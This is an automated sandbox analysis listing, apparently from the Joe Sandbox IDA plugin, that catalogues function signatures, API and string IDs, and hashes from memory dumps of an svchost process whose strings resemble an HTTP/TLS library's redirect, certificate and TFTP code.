                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$_strdupatoi
                                                                                                                                                                                • String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s$The redirect target URL could not be parsed: %s
                                                                                                                                                                                • API String ID: 1183536637-2860807360
                                                                                                                                                                                • Opcode ID: 28ace56903274acb49c7854b87f6e47dcb3ce4e297e3fa4c20f23dcda9b7233a
                                                                                                                                                                                • Instruction ID: 6e1282081dad6c9c3b7af09bc7f495e2b451def7d6a9cb4adfc0bce4d16441cf
                                                                                                                                                                                • Opcode Fuzzy Hash: 28ace56903274acb49c7854b87f6e47dcb3ce4e297e3fa4c20f23dcda9b7233a
                                                                                                                                                                                • Instruction Fuzzy Hash: 32D19062A0DA8389FBA09B6D94506FA26E1AF8DBC8F4C0031DF4D4B695DF3CD4478758
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CertCertificateContextmemcmp$CryptErrorFreeLastObjectQueryStore
                                                                                                                                                                                • String ID: -----END CERTIFICATE-----$-----BEGIN CERTIFICATE-----$schannel: CA file '%s' is not correctly formatted$schannel: added %d certificate(s) from CA file '%s'$schannel: did not add any certificates from CA file '%s'$schannel: failed to add certificate from CA file '%s' to certificate store: %s$schannel: failed to extract certificate from CA file '%s': %s$schannel: unexpected content type '%lu' when extracting certificate from CA file '%s'
                                                                                                                                                                                • API String ID: 151793846-2991118681
                                                                                                                                                                                • Opcode ID: 6ff8c324aff2f0198d9b59ca9825f3150bb98cba1bcb5993b5d14288d06af033
                                                                                                                                                                                • Instruction ID: 668bfe0c4a5885b88e5c0b6f80d926a245340f806cf0ea3a79129d1eb57e5ba0
                                                                                                                                                                                • Opcode Fuzzy Hash: 6ff8c324aff2f0198d9b59ca9825f3150bb98cba1bcb5993b5d14288d06af033
                                                                                                                                                                                • Instruction Fuzzy Hash: 8761AE61A1CB4681EA618B1DE4543BA7690BB4DBC0F4C1035EF4D4B799DFBCE54A8B08
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$_strdup$fclose
                                                                                                                                                                                • String ID: default$login$macdef$machine$password
                                                                                                                                                                                • API String ID: 800660972-1563471620
                                                                                                                                                                                • Opcode ID: f2179b817266ac44dca06cc007b7eec2a50b4ccbaa85a406e78592927c63effc
                                                                                                                                                                                • Instruction ID: 3d7dcf7a99b0beba2e43f63215b914730abb43c237cfa8cb52d32fc1ec804b0b
                                                                                                                                                                                • Opcode Fuzzy Hash: f2179b817266ac44dca06cc007b7eec2a50b4ccbaa85a406e78592927c63effc
                                                                                                                                                                                • Instruction Fuzzy Hash: EBD1CE22A0C69385FB759A2D99503BA6690AF4DBC4F0C0571DF9F066D5EF2CE8438B18
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressHandleModuleProcwcspbrk
                                                                                                                                                                                • String ID: AddDllDirectory$LoadLibraryExW$kernel32
                                                                                                                                                                                • API String ID: 3596313701-3974551115
                                                                                                                                                                                • Opcode ID: d3c9d679da3d1a685f71380ff1dc9f886aba44e69df83046cfd6abf768ea9229
                                                                                                                                                                                • Instruction ID: ff28c4d584095b55e59cb44b1ef57f97431ca8a8d57ede674e0b619927aeb479
                                                                                                                                                                                • Opcode Fuzzy Hash: d3c9d679da3d1a685f71380ff1dc9f886aba44e69df83046cfd6abf768ea9229
                                                                                                                                                                                • Instruction Fuzzy Hash: A6419112B0964682EA559F1EA90423977A1BF8DBD5F0C8130CF5D03798EF3DE4878708
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: sendto$_time64
                                                                                                                                                                                • String ID: Received last DATA packet block %d again.$Received unexpected DATA packet block %d, expecting block %d$Timeout waiting for block %d ACK. Retries = %d$tftp_rx: internal error
                                                                                                                                                                                • API String ID: 2327272419-2691569196
                                                                                                                                                                                • Opcode ID: 54bae6070d0c16fe8eac9c3d86684825141ddb25db85128f2de5e99b9b764f3b
                                                                                                                                                                                • Instruction ID: 58d40096efd3ab96117ff66a2cf26f1ef979cfb044efdf01103238dcb4886e21
                                                                                                                                                                                • Opcode Fuzzy Hash: 54bae6070d0c16fe8eac9c3d86684825141ddb25db85128f2de5e99b9b764f3b
                                                                                                                                                                                • Instruction Fuzzy Hash: 42913B72608B82C5E7A18F29D8947A93BA0E788F89F088136DF4D4B768DF3DD546C714
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strlen$malloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3157260142-0
                                                                                                                                                                                • Opcode ID: bab9e201f35533498d5ffe7c62f90dbf08eda0b4ce6cb153236da57cbd266d92
                                                                                                                                                                                • Instruction ID: 0534087b0e701903961d93f7aa28f9b970e5e5cf5cb79d7fc815b1099d6b10dc
                                                                                                                                                                                • Opcode Fuzzy Hash: bab9e201f35533498d5ffe7c62f90dbf08eda0b4ce6cb153236da57cbd266d92
                                                                                                                                                                                • Instruction Fuzzy Hash: 67E180B7719AC982DF24CB19E45835EB6A1F785B88F848525CEE957B88DF3DC049C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressCertHandleModuleNameProcString
                                                                                                                                                                                • String ID: 2.5.29.17$schannel: CertFindExtension() returned no extension.$schannel: CryptDecodeObjectEx() returned no alternate name information.$schannel: Empty DNS name.$schannel: Not enough memory to list all hostnames.$schannel: Null certificate context.$schannel: Null certificate info.
                                                                                                                                                                                • API String ID: 4138448956-4204188966
                                                                                                                                                                                • Opcode ID: 66634f126cd0e15532aca56fd3f635f11e922a414445dff4ae4aaccda5f423a9
                                                                                                                                                                                • Instruction ID: b241badbce0dcc8cc991841554653990416197306e5ef17eb901ea19a4b4d2be
                                                                                                                                                                                • Opcode Fuzzy Hash: 66634f126cd0e15532aca56fd3f635f11e922a414445dff4ae4aaccda5f423a9
                                                                                                                                                                                • Instruction Fuzzy Hash: AC616C62A0C78285EA619B19E4407BA7760FB88BD4F5C4135DF4E03794DF3DE48ACB08
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 6828C220: strchr.MSVCRT ref: 6828C257
                                                                                                                                                                                  • Part of subcall function 6828C220: setlocale.MSVCRT ref: 6828C269
                                                                                                                                                                                  • Part of subcall function 6828C220: _strdup.MSVCRT(?,?,?,?,?,?,68287D85), ref: 6828C27A
                                                                                                                                                                                  • Part of subcall function 6828C220: setlocale.MSVCRT ref: 6828C2AC
                                                                                                                                                                                  • Part of subcall function 6828C220: free.MSVCRT ref: 6828C2CE
                                                                                                                                                                                • strchr.MSVCRT ref: 68287D90
                                                                                                                                                                                • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 68287DB0
                                                                                                                                                                                • strcmp.MSVCRT ref: 68287DD2
                                                                                                                                                                                • strncpy.MSVCRT ref: 68287DEF
                                                                                                                                                                                • EnumSystemLocalesA.KERNEL32 ref: 68287E11
                                                                                                                                                                                • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 68287E28
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: setlocalestrchr$EnumLocalesSystem_strdupfreepthread_mutex_lockpthread_mutex_unlockstrcmpstrncpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3715319363-0
                                                                                                                                                                                • Opcode ID: c6a594b9fceb763ea04cda396f9cafc38307eee5609c706cb0d3b083be9dfe11
                                                                                                                                                                                • Instruction ID: 30c4b0ccd22984e49effa0c280e7d9621567dd064359c0b416f4409a9f50fb22
                                                                                                                                                                                • Opcode Fuzzy Hash: c6a594b9fceb763ea04cda396f9cafc38307eee5609c706cb0d3b083be9dfe11
                                                                                                                                                                                • Instruction Fuzzy Hash: DC217FB871110BC6FF04DB67ECA477523A3BB45795FC48626C52A872E0EF69C8A88340
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                • String ID: AreFileApisANSI$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                                                                                                                                                • API String ID: 544645111-4046831456
                                                                                                                                                                                • Opcode ID: 7d4ed418a927d04ac624a05b81053c034e8a04d9b9dc4dc269fc3ecd57adef33
                                                                                                                                                                                • Instruction ID: 2788fa210f2e456a000ad759d4b0948ec30d8e83f23f7f9615c6493010c4caa5
                                                                                                                                                                                • Opcode Fuzzy Hash: 7d4ed418a927d04ac624a05b81053c034e8a04d9b9dc4dc269fc3ecd57adef33
                                                                                                                                                                                • Instruction Fuzzy Hash: 74416160A1B60BB5EE459F64ECA06E82360EF507C8F84943AD50D07661EFBCF75AE340
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Crypt$Context$Release$AcquireDestroyEncryptImport
                                                                                                                                                                                • String ID: @
                                                                                                                                                                                • API String ID: 3016261861-2766056989
                                                                                                                                                                                • Opcode ID: cbc2a61e9400134184d9ef90b65431a85d5e3c910724a0c42f89f5d951b23c2b
                                                                                                                                                                                • Instruction ID: f2ee4106a97f7734346a5b874ed33910abec9212fa433cccef40f70c7f700f70
                                                                                                                                                                                • Opcode Fuzzy Hash: cbc2a61e9400134184d9ef90b65431a85d5e3c910724a0c42f89f5d951b23c2b
                                                                                                                                                                                • Instruction Fuzzy Hash: C541B062B046A18EF7108BB9E4503EE3BB1F74A788F044025DF9D13A5ACB3DC11ADB50
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlCaptureContext.KERNEL32 ref: 6828C954
                                                                                                                                                                                • RtlLookupFunctionEntry.KERNEL32 ref: 6828C96B
                                                                                                                                                                                • RtlVirtualUnwind.KERNEL32 ref: 6828C9AD
                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 6828C9F4
                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32 ref: 6828CA01
                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 6828CA07
                                                                                                                                                                                • TerminateProcess.KERNEL32 ref: 6828CA15
                                                                                                                                                                                • abort.MSVCRT ref: 6828CA1B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4278921479-0
                                                                                                                                                                                • Opcode ID: a62c5bb7412ab743e846d4a6747dc65f387974b4e5a27c3ec64f4ee464831e3e
                                                                                                                                                                                • Instruction ID: 907bef7b485367586e7d5af050a26f2140c0965c287e774aed3a681ef61c9931
                                                                                                                                                                                • Opcode Fuzzy Hash: a62c5bb7412ab743e846d4a6747dc65f387974b4e5a27c3ec64f4ee464831e3e
                                                                                                                                                                                • Instruction Fuzzy Hash: D2213C79611B02D9FF048B56F86439937A6BB08BA9F408226D94E13774EF7AC1A4C350
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: calloc$ErrorLastbind
                                                                                                                                                                                • String ID: bind() failed; %s
                                                                                                                                                                                • API String ID: 2604820300-1141498939
                                                                                                                                                                                • Opcode ID: 72085b316e702c6f37b76fc0a7192d2d414184f1260d387557959307930bce75
                                                                                                                                                                                • Instruction ID: 1b7005858b1ae93507d9c13e4db58018d108b0070cb5baf98fd4e5f7487906d7
                                                                                                                                                                                • Opcode Fuzzy Hash: 72085b316e702c6f37b76fc0a7192d2d414184f1260d387557959307930bce75
                                                                                                                                                                                • Instruction Fuzzy Hash: AF516C71A08A8289EB659F29D8843AA2395FB4CBC8F080035DF4D4B795EF7CE493C754
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                • Opcode ID: 7c9a2a822fee2ecb50c68583464408cf486fb1c646e770143a82d90880cca3db
                                                                                                                                                                                • Instruction ID: 1a0ae952c1d8d472b70188d7540b8f5e2331693924c1f8814516ef652cc3ab5b
                                                                                                                                                                                • Opcode Fuzzy Hash: 7c9a2a822fee2ecb50c68583464408cf486fb1c646e770143a82d90880cca3db
                                                                                                                                                                                • Instruction Fuzzy Hash: B9415E32619B8196E760CF34E8443AE77A4FB88798F540135EA9D46B98EF3CD649DB00
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InfoLocale$strncmpstrtoul
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2149573502-0
                                                                                                                                                                                • Opcode ID: 474acadfda03ee1b901add7048b340572f97cfaef7de19b123f6c24da647dde7
                                                                                                                                                                                • Instruction ID: 2794244527accb634c04e781932744af81369bf3b8d7d80f3fe85dafbe55b027
                                                                                                                                                                                • Opcode Fuzzy Hash: 474acadfda03ee1b901add7048b340572f97cfaef7de19b123f6c24da647dde7
                                                                                                                                                                                • Instruction Fuzzy Hash: C921F9B332058582EF048B25ED457AA6393EB44BD5FC88135CAA9C769CEA6DC59D8300
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
